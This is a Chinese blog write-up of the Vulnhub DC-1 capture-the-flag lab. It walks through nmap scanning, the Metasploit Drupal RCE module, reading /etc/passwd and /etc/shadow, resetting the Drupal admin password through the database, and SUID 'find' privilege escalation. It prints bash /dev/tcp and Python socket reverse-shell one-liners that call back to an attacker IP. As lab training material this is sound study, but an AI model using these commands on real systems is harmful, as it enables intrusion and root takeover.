Vulnhub-DC1

最新推荐文章于 2024-07-25 22:24:14 发布
最新推荐文章于 2024-07-25 22:24:14 发布
阅读量846 收藏 20
点赞数 16
分类专栏: Vulnhub 文章标签: 网络安全 学习 安全威胁分析 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/135587730
版权

前言

一个比较简单的实战靶场,官方要求是找到/root下的flag,所以直接提权即可。但对于学习和训练来说还是太简略了,在打靶场的时候还是全面一些较好。

本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。

环境配置

虚拟机Kali:IP-192.168.232.140

DC-1靶场机:

官网下载 https://download.vulnhub.com/dc/DC-1.zip

将攻击机kali和vulhub靶机配置一个网卡即可!这里使用的都是NAT模式。

渗透过程

信息收集阶段

通过Nmap进行网段的存活主机的探测,以及端口的探测:

命令:nmap -sV -Pn 192.168.232.0/24

这里发现192.168.232.147 便是靶机的地址,开放的端口存在22 80 111端口,尝试访问80web服务:

这个界面现在来看是相当的熟悉了,还记得ISCC2023的实战题目就是这个Drupal的远程命令执行吧?

drupal是一个开源PHP管理系统,架构使用的是php环境+mysql数据库的环境配置。在Drupal 6.x,7.x,8.x系列的版本中,均存在远程代码执行漏洞。

MSF攻击

接下来我们尝试使用msf来进行攻击:

msfconsole
search drupal
use 1
set rhost 192.168.232.147
set lhost 192.168.232.140
run

接下来开启交互式shell

交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

我们可以看到当前的用户是www-data

python -c		//实际上-c代表着command的意思,可以再命令行中调用python代码
import pty;pty.spawn("/bin/bash")	//使用 python 的 pty 来转换为 交互式shell
也可以使用:"__import__('subprocess').call(['/bin/bash'])"

Linux机器信息收集

DNS配置文件

/etc/resolv.conf

系统用户配置文件

/etc/passwd

(这里发现了flag4 该文件的路径在/home/flag4)

影子文件

/etc/shadow			系统用户的密码信息

说是没有权限

查看进程

ps aux

发现数据库进程!

寻找flag

当前的目录下面存在着flag1.txt,但是说是需要寻找配置文件:

接下来就去查询了一下drupal的配置文件,说是有一个settings.php文件

之后定位到这个文件的路径:

发现了flag2的提示:他说“使用暴力破解和字典攻击并不是唯一获得权限的方式,你能用这些信息做什么?”

下面就是数据库的用户和密码了,那么我们就可以连接数据库了:

使用数据库的账号和密码来连接到数据库:

查看存在的数据库:(show databases;)

查看drupaldb数据库中存在哪些表:

发现了存在着user表。

这里经过查阅相关资料,两种方法可以重置密码:

  1. 在根目录下面的index.php中添加
require_once 'includes/password.inc';
require_once 'includes/bootstrap.inc';
echo user_hash_password('123456');

这样就能在页面中显示123456加密后的密码。

  1. 定位到drupal根目录下
    1. 执行 script/password-hash.sh 密码 这样也是可以获取到加密后的密码的

之后有了加密的密码,便可以更新掉users表中的密码!

接下来就是去修改密码:

使用admin 123456 登录drupal:

Find content里面发现了还未发布的flag3!

提权

利用SUID提权

首先是查看哪些文件具有suid权限:

find / -perm -u=s -type f 2>/dev/null

首先查找一下find命令在哪里: which find

再检查一下find命令是否存在suid权限:ls -l /usr/bin/find

发现确实find命令是具有suid权限的。

最后使用find命令执行一下‘whoami’发现是root权限:

touch getroot

find / -type f -name getroot -exec "whoami" \;

这里需要注意的是find 后面跟着的路径必须是存在的! 如果不存在的话 后面的exec就会报错,不会执行的

find /etc/passwd -exec "/bin/sh" \;

nc监听反弹shell

kali攻击机上执行 :nc -lvvp 6666

Msf中执行构建好的find命令:

find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.232.140/6666 0>$1 \;

还可以通过python来反弹shell:

find /etc/passwd python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  #反弹一个sh类型的shell

此时已经提权为root权限啦。

最终在root目录下,发现了最终的flag。

Y4y17
关注
专栏目录
Vulnhub-DC1靶机渗透
devil8123665的博客
07-21 244
Vulnhub-DC1靶机渗透 https://blog.csdn.net/adminuil/article/details/101269264
vulnhub-dc1
bqnagus
09-30 186
vulnhub-dc1靶机实验
vulnhub--DC1
baiyexing8的博客
10-14 1023
发现用户密码被hash加密了,百度查找后了解到Drupal的加密脚本在根目录的scripts中,可以生成一个密码来重置管理员密码。根据flag1的提示百度,得到Drupal的数据库配置文件在sites/default/settings.php。suid的作用:用于执行文件,以文件的拥有者的身份运行该文件。打开发现flag4在home目录中,进入/home/flag4目录中找到flag4.txt文件。拿到meterpreter以后查看当前目录,发现flag1.txt,cat得到flag1。
看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Aluxian_的博客
03-22 7497
Vulnhub靶机DC1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/dc-1,292/ Vulnhub靶机安装: 下载好了把安装包
vulnhub靶机DC1
weixin_52450702的博客
10-29 933
靶机DC1IP:192.168.70.160。
VulnHub----DC1靶场记录
x1871329637的博客
04-26 3209
00-环境介绍 靶机下载地址:DC: 1 ~ VulnHub 攻击机:kali2022:192.168.200.129 DC1:192.168.200.135 目标:拿到5个flag 1由于这是一次黑盒测试所以只能根据目标mac地址来确认靶机的ip信息 由此判定靶机ip为192.168.200.135 2nmap直接扫 nmap -A 192.168.200.135 -p 1-65535 由此可见开放了22 80 111 42892端口,可以先去访问一下80端口 .
vulnhubDC1靶机
LainWith的博客
08-15 1234
靶机概览信息收集nmap信息收集网站信息收集使用nikto来收集一下渗透攻击查找漏洞 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC1的MAC,这样做主机发现时可以通过MAC来过滤靶机。 nmap信息收集 1:使用nma.
vulnhub-dc1靶场
longwanlian的博客
11-29 965
nmap信息收集,wappalyzer插件找cmsnmap -T4 -sV -O -A -P ip //T4速度 -sV查看服务 -O操作系统 -p端口 将所有主机视为在在线,跳过主机发现漏洞利用Drupalmsfconsolemsf6>use 1msf6>set RHOST 目标ipmsf6>set payload 默认payload' 使用python创建一个交互式shellfind命令进行信息收集数据库改密码。
渗透测试Vulnhub-DC1
TenG的博客
04-17 247
前言 各位师傅们好,在正式写文章前罗嗦几句,很早以前就想搭一个内网渗透的靶场来练习了,不过因为一些原因一直在往后推迟(主要是因为太懒)。这段时间发生了一些事情让我坚定了搞搞内网渗透的信念,目前来说事请还是挺不好的,跟一位最近朋友说过以后他跟我讲以后更大的坎还多着呢,他也跟我说了下自己的心酸往事,听过以后自己也有了些许感触,而这件事请对于我来说到底是好是坏待以后时间证明(至少目前是感觉挺失落的)。还有就是有一个姐姐真好,也正是她一直以来的安慰才能让我调整这么快,不管是这次还是从前或以后兜希望老姐一直能陪着我。
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
Romax学习资料-DC1模块-载荷谱处理
03-14
### Romax学习资料-DC1模块-载荷谱处理 #### 一、直方图法 ##### 1.1 简介 在Romax软件的DC1模块中,直方图法是一种常用的载荷谱处理方法。这种方法主要用于对原始数据进行统计分析,并通过构建直方图来获取不同...
docker-compose version 1.23.0,build c8524dc1
09-01
centos7安装docker后,并没有安装docker-compose,而且很多源里没有,无法通过yum安装,wget github的源码,有时候会很慢,这里提供一个现成的,源码编译好的docker-compose。centos7安装docker和docker-compose,...
ST_DC1-configs:DC1子卡的Machinekit配置文件(对于DE10-Nano)
02-21
ST_DC1-配置 DC1子卡的机器套件配置文件(对于DE10-Nano) 用于ShadeTechnik DC1子卡的DE10-Nano硬件测试和设置的Machinekit Hal和GUI文件。 仍在进行中,可能会进行修订。
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Python编程学习第一篇——Python零基础快速入门(六)(4)异常处理
urhero的专栏
07-25 239
我们已经了解了Python的基本数据类型、变量和基本的逻辑控制语句,基于这些基础知识可以编写一些小程序了,但是在写程序的时候我们会发现,有时候程序并不是按我们预期的方向执行,有的直接报错,有的没有报错,却并未得到我们预期的结果。在这个例子中,除数为0会引发ZeroDivisionError异常,我们将异常信息赋值给变量e,并输出"除数不能为0"和异常信息。在这个例子中,由于除数不为0,所以没有发生ZeroDivisionError异常,代码会执行else语句块,并输出结果2.0。
Linux:基础命令学习
qq_55038440的博客
07-20 1382
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
AvaloniaUI的学习
最新发布
lishuangquan1987的博客
07-25 631
官方中文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome。
python实现ECC算法编写以下题目:参数选取p=11,椭圆曲线为y^2=x^3+v+6,Ep(1,6)的一个生成元为G=(2,7)私钥d=7,用户A的公钥P=dG=(7,2)明文M=(9,1),加密:明文M=(9,1),用户B随机选取数k=6,由c1=kG,c2=M+k*PA得到密文为c3,解密:c2-dc1=(9,1)给出完整代码和结果
06-03
代码如下: ```python p = 11 v = 6 a = 1 b = 6 d = 7 k = 6 G = (2, 7) M = (9, 1) ... lam = ((b[1]-a[1]) * pow(b[0]-a[0], p-2, p)) % p ...注:此代码仅供参考,实际应用中还需要进行一些安全性考虑,如选择更大的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值